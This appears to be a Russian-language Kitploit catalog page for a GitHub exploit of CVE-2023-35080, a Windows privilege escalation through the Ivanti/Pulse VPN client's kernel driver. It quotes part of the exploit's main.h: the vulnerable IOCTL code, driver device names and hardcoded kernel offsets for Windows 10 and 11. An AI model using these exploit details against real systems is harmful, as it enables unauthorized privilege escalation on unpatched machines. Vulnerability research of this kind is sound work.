Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation | Kitploit
Инструменты/GitHubGitHub/hophouse/ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation
Повышение привилегийФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияЭксплуатация Бинарных Файлов
GitHubhophouse/ivanti-pulse_vpn-client_exploit-cve-2023-35080_privilege-escalation

Ivanti-Pulse_VPN-Client_Exploit-CVE-2023-35080_Privilege-escalation

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
12 лет назадЕщё не проверено

Эксплойт для Ivanti/Pulse VPN Client с использованием CVE-2023-35080, приводящий к повышению привилегий

Код, связанный с эксплуатацией CVE-2023-35080, который использует примитив записи в драйвере ядра клиента Ivanti/Pulse VPN в Windows. Примитив записи приводит к повышению привилегий.

Эксплойт был создан с помощью технических деталей, опубликованных в следующей статье: https://northwave-cybersecurity.com/ivanti-pulse-vpn-privilege-escalation.

Некоторые детали захардкожены в файле main.h:

root@kitploit:~
#pragma once

#include <Windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <winternl.h>


#define VULN_IOCTL  0x80002018

////////

/*
 * jnprTdi_9115_15819 W10
 */

 // #define DEVICE_NAME_W L"jnprTdi_9115_15819"

 // // KxWaitForSpinLockAndAcquire
 // #define SPIN_OFFSET 0x300ea0

 // // KxTryToAcquireSpinLock
 // #define TRY_SPIN_OFFSET 0x361758

 // // void write_char(byte param_1,byte **param_2,int *param_3)
 // #define WRITE_CHAR_OFFSET 0x3d5878

 ////////

 /*
  * jnprTdi_9117_18209 W11
  */

#define DEVICE_NAME_W L"jnprTdi_9117_18209"

  // KxWaitForSpinLockAndAcquire 
#define SPIN_OFFSET 0x300e9e

// KxTryToAcquireSpinLock
#define TRY_SPIN_OFFSET 0x361757

// void write_char(byte param_1,byte **param_2,int *param_3)
#define WRITE_CHAR_OFFSET 0x3d93f8

////////

[...]
Скачать инструмент